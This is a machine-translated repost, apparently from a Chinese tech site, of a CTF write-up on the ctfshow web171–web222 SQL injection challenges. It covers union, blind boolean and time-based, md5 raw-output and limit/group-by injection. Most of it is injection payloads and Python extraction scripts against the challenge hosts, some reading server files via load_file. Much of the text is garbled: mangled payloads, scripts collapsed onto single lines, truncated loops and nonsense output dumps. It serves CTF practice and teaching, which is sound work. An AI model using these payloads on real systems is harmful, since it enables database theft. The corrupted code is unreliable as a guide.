Shulou(Shulou.com)05/31 Report--

What are the common sql injection types in php? I believe many inexperienced people don't know what to do about it. Therefore, this article summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

1. Unfiltered injection web171~union Joint injection / / splicing sql statement to find the specified ID user $sql = "select username,password from user where username! = 'flag' and id ='". $_ GET ['id']. "' limit 1;"

Start directly

1. Talk about music +

Success will precede the user password with an id of 1.

1 'order by 3muri +

There are echoes in 1pm and 2pm.

-1 'union select 1, 2, 2, 3, Murray +

The library name ctfshow_web is revealed.

-1 'union select 1, 1, 2, database ()-- +

Reveal the table name ctfshow_user

-1 'union select 1pm 2m grouproomconcat (table_name) from information_schema.tables where table_schema='ctfshow_web'--+

Column name id,username,password is revealed.

-1 'union select 1pm 2 from information_schema.columns where table_name='ctfshow_user' and table_schema=database (column_name) group concat ()-- +

Expose the contents of the field

4userAUTOpasswordAUTOPROGER 5userAUTOpasswordAUTOPROGER 6userAUTOpasswordAUTOPROGRAPHY 8userAUTOpasswordAUTOOOBER 9userAUTOpasswordAUTOOOBER 10userAUTOpasswordAUTOPROBEN 11userAUTOpasswordAUTO12userAUTOpasswordAUTO12userAUTOpasswordAUTO14userAUTOpasswordAUTO14userAUTOpasswordAUTO15userAUTOpasswordAUTO16userAUTOWODAUTOAUTORE18userAUTOwordAUTOPROBER

You can also grab the bag and find the api directly and expose it directly.

Http://96977979-97ee-410a-8c0f-bd0b2883bd95.chall.ctf.show/api/?id=1'or1--+&page=1&limit=10web172

The process will not come.

direct

-1 'union select 1 from ctfshow_user2--+web173~hex coding for groupmaker concat (username,password)

Query statement

/ / stitching sql statements to find the specified ID user $sql = "select id,username,password from ctfshow_user3 where username! = 'flag' and id ='". $_ GET ['id']. "' limit 1;"; return logic / / check whether the result has flagif (! preg_match ('/ flag/i', json_encode ($ret) {$ret ['msg'] =' query success';}

Filtered return string cannot contain flag

Then we can just code him in hexadecimal.

Boolean blind injection of from ctfshow_user3--+web174~py script-1 'union select 1 and 2 Magi hex (group_concat (username,password))

Query statement

/ / stitching sql statements to find the specified ID user

$sql = "select username,password from ctfshow_user4 where username! = 'flag' and id ='". $_ GET ['id']. "' limit 1;"

Return logic

/ / check whether there is a flag in the result

If (! preg_match ('/ flag | [0-9] / iTunes, json_encode ($ret)) {

$ret ['msg'] =' query successful'

}

There is no echo, so we have no choice but to bet blindly.

1 'and ascii (substr ((select password from ctfshow_user4 where username =' flag'), 1mai 1)) = 2murmuri +

It is verified that success can be blindly invested. The first ascii is 102, that is, f

Write a script.

# @ Author:yanmieimport requestsurl = "http://d273060e-9119-43c3-9737-acf668088663.chall.ctf.show/api/v4.php?id=1' and" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Rv:81.0) Gecko/20100101 Firefox/81.0 "} i=0j=1result ="while True: iMagi + 1 payload =" ascii (substr ((select password from ctfshow_user4 where username = 'flag'), {j}, 1) = {I}-+ "# print (iMagazine j) payload = payload.format (jinjjMagazi) # print (payload) response = requests.get (url = url+payload) Headers = headers) if "admin" in response.text: result + = chr (I) print (result) I = 0j = juni1 if I = 128breakprint (result)

Boy, it took a little while to get out of the self-adding script.

Then write another dichotomy script:

# @ Author:yanmieimport requestsurl = "http://d273060e-9119-43c3-9737-acf668088663.chall.ctf.show/api/v4.php?id=1' and" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"} I = 0result = "" while True: head = 0 tail = 127i + = 1 while head 0: if "$user_count = 43 "in response.text: if chr (j)! =".: flag + = chr (j) break; print (flag.lower ()) if chr (j) ='}': breakweb186

Query statement

/ / stitching sql statements to find the specified ID user

Sql = "select count (*) from". $_ POST ['tableName']. ";"

Return logic

/ / filter the passed parameters

Function waf ($str) {

Return preg_match ('/ * |\ x09 |\ x0a |\ X0c |\ 0x0d |\ xa0 |% | ^ |\ X00 | # |\ x23 | [0-9] | file | = | or |\ x7c | select | and | flag | into | where |\ x26 |'| "| union | `| sleep | benchmark/i', $str)

}

Query result

/ / returns the total number of records in the user table

$user_count = 0

You can just take the script on the question.

# @ Author: yanmieimport requestsurl = "http://f9cb7903-66ce-445d-874a-b54de32dd8da.chall.ctf.show/select-waf.php"payload =" ctfshow_user as a right join ctfshow_user as b on (substr (b.pass, {}) {}) regexp (char ({})) "I = 5flag =" flag {"def createNum (n): num = 'true' if num = = 1: return' true' else: for i in range (n Mui 1): num + ='+ true' return num While True: I + = 1 for j in range: data= {"tableName": payload.format (createNum (I), createNum (1), createNum (j))} response = requests.post (url=url,data=data) if "$user_count = 43;" in response.text: if chr (j)! = ".": flag + = chr (j) break Print (flag.lower ()) if chr (j) = ='}': breakweb187~md5 sql injection

Query statement

/ / stitching sql statements to find the specified ID user

$sql = "select count (*) from ctfshow_user where username ='$username' and password='$password'"

Return logic

$username = $_ POST ['username']

$password = md5 ($_ POST ['password'], true)

/ / only admin can get flag

If ($usernameplate administrator admin') {

$ret ['msg'] =' user name does not exist'

Die (json_encode ($ret))

}

The md5 () function takes two arguments, one is the string to be encrypted, and the other is the output format

Optional. Specify the hexadecimal or binary output format:

TRUE-original 16 character binary format

FALSE-default. 32 character hexadecimal number

But when the query statement is composed, the hex will be converted to a string, and if the converted string contains' or', it will be formed together with the original query statement.

That is, after the password is converted to a hexadecimal value, it is converted to a string containing'or 'xxx.

Provide a string: ffifdyop

After md5, 276f722736c95d99e921722cf9ed621c

Then convert it to a string: 'or'6

Web188~where logical condition

Query statement

/ / stitching sql statements to find the specified ID user

$sql = "select pass from ctfshow_user where username = {$username}"

Return logic

/ / user name detection

If (preg_match ('/ and | or | select | from | where | union | join | benchmark |, (|) |'| "/ iTunes, $username)) {

$ret ['msg'] =' illegal user name'

Die (json_encode ($ret))

}

/ / password detection

If (! is_numeric ($password)) {

$ret ['msg'] =' password can only be numeric'

Die (json_encode ($ret))

}

/ / password judgment

If ($row ['pass'] = = intval ($password)) {

$ret ['msg'] =' login succeeded'

Array_push ($ret ['data'], array (' flag'= > $flag))

}

Here limit passwords can only be numbers, but here is a weak comparison, 0==admin

The user name also has a lot of restrictions, but there are still a lot of postures.

Select * from users where first_name=0; select * from users where first_name=1 returns the first occurrence of the string str substring substr, starting at pos. If substr is not in str, the return value is 0

POSITION (substr IN str)-> returns the position where the substring substr first appears in the string str. If the substring substr does not exist in str, the return value is 0

Construct payload:

Username=username=if (locate ("flag {", load_file ('/ var/www/html/api/index.php')) > 0pyrrine 1) & password=1

Page return

{"code": 0, "msg": "\ u5bc6\ u7801\ u9519\ u8bef", "count": 0, "data": []}

Flag does exist in the document.

Write a script:

Idea: first get the location of flag, and then use dichotomy to get each character concatenated into flag from this position.

# @ Author: yanmieimport requestsurl = "http://54e509b4-af7d-4ba0-95cd-c84c9a7d0886.chall.ctf.show/api/index.php"def getFlagPos (): payload =" if (locate ('flag {', load_file ('/ var/www/html/api/index.php')) >% dpje 0je 1) "head = 0 tail = 1000 while head1,sleep (2), 0)

Write a script:

Self-increasing method:

# @ Author: yanmieimport requestsurl = "http://404d8d96-01d3-4d8e-a14e-aaf5c80a5d67.chall.ctf.show/api/"payload =" if (ascii (substr ((select group_concat (table_name) from information_schema.tables where table_schema=database ()), {}, 1)) = {}, sleep (2), 0) "I = 0table =" while True: I + = 1 for j in range (127): data = {"debug": 1 "ip": payload.format (iMagazine j)} try: response = requests.post (url=url,data=data,timeout=1) except Exception as e: break If j = 126: break table + = chr (j) print (table.lower ()) # get ctfshow_flagx,ctfthow_info

It's a little slow, before writing a dichotomy:

# @ Author: yanmieimport requestsurl = "http://1a8ae547-99fa-47fe-b1a2-7a163a579dcf.chall.ctf.show/api/"# payload =" if (ascii (substr ((select group_concat (table_name) from information_schema.tables where table_schema=database (), {}, 1)) > {}, sleep (2), 0) "# get ctfshow_flagx,ctfthow_info# payload =" if (substr ((select group_concat (column_name) from information_schema.columns where table_name='ctfshow_flagx')) {}, 1)) > {}, sleep (2), 0) "# get id,flaga,infopayload =" if (ascii (substr ((select group_concat (flaga) from ctfshow_flagx), {}, 1)) > {}, sleep (3), 0) "# get flag I = 0result =" while True: I + = 0 tail = 127while head1, (SELECT count (*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C) 0) web220function waf ($str) {

Return preg_match ('/ sleep | benchmark | rlike | ascii | hex | concat_ws | concat | mid | substr/i',$str)

}

Use ord instead of ascii

Use locate instead of substr

Use Cartesian product

6. Other injection web221~limit injection

Query statement

/ / pagination query

$sql = select * from ctfshow_user limit ($page-1) * $limit,$limit

Return logic

/ / TODO: it is safe and does not require filtering.

/ / even if you get the database name, you win.

LIMIT can be followed by two functions. PROCEDURE and INTO,into require write permission, which is not common, but PROCEDURE has been deprecated since msyql5.7.

P Niu article

Payload:

Http://1c1edfaa-f567-4fba-a04f-285c886e937d.chall.ctf.show/api/?page=2&limit=1 procedure analyse (extractvalue (rand (), concat (0x3a dint database (), 1) web222~group by injection

Query statement

/ / pagination query

$sql = select * from ctfshow_user group by $username

Return logic

/ / TODO: it is safe and does not require filtering.

Blind injection can be used

Payload

Http://84f3c1f3-59e9-47e4-9855-c2af4f32432d.chall.ctf.show/api/?u=if((1=2),username,0)&page=2&limit=10

Script:

# Author: yanmieimport requestsurl = "http://84f3c1f3-59e9-47e4-9855-c2af4f32432d.chall.ctf.show/api/"# payload =" if (ascii (substr ((select group_concat (table_name) from information_schema.tables where table_schema=database (), {}, 1)) > {}, username,0) "# get ctfshow_flaga,ctfshow_user# payload =" if (ascii (substr ((select group_concat (column_name) from information_schema.columns where table_name='ctfshow_flaga'), {}) 1)) > {}, username,0) "# get id,flagaabc,infopayload =" if (ascii (substr ((select group_concat (flagaabc) from ctfshow_flaga), {}, 1)) > {}, username,0) "# get flagresult ="I = 0while True: I + = 1 head = 0 tail = 127while head {}, sleep (0.5), 1) and'1 get banlist,ctfshow_user" Flag233333# paylaod = "ctfshow' and if (ascii (substr ((select group_concat (column_name) from information_schema.columns where table_name='flag233333'), {}, 1)) > {}, sleep (0.5,1) and'1 get id,flagass233,infopaylaod =" ctfshow' and if (substr ((select group_concat (flagass233) from flag233333), {}, 1)) > {}, sleep 1) and '1benchmark 1 "result ="I = 0while True: I + = 1 head = 0 tail = 127while head

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.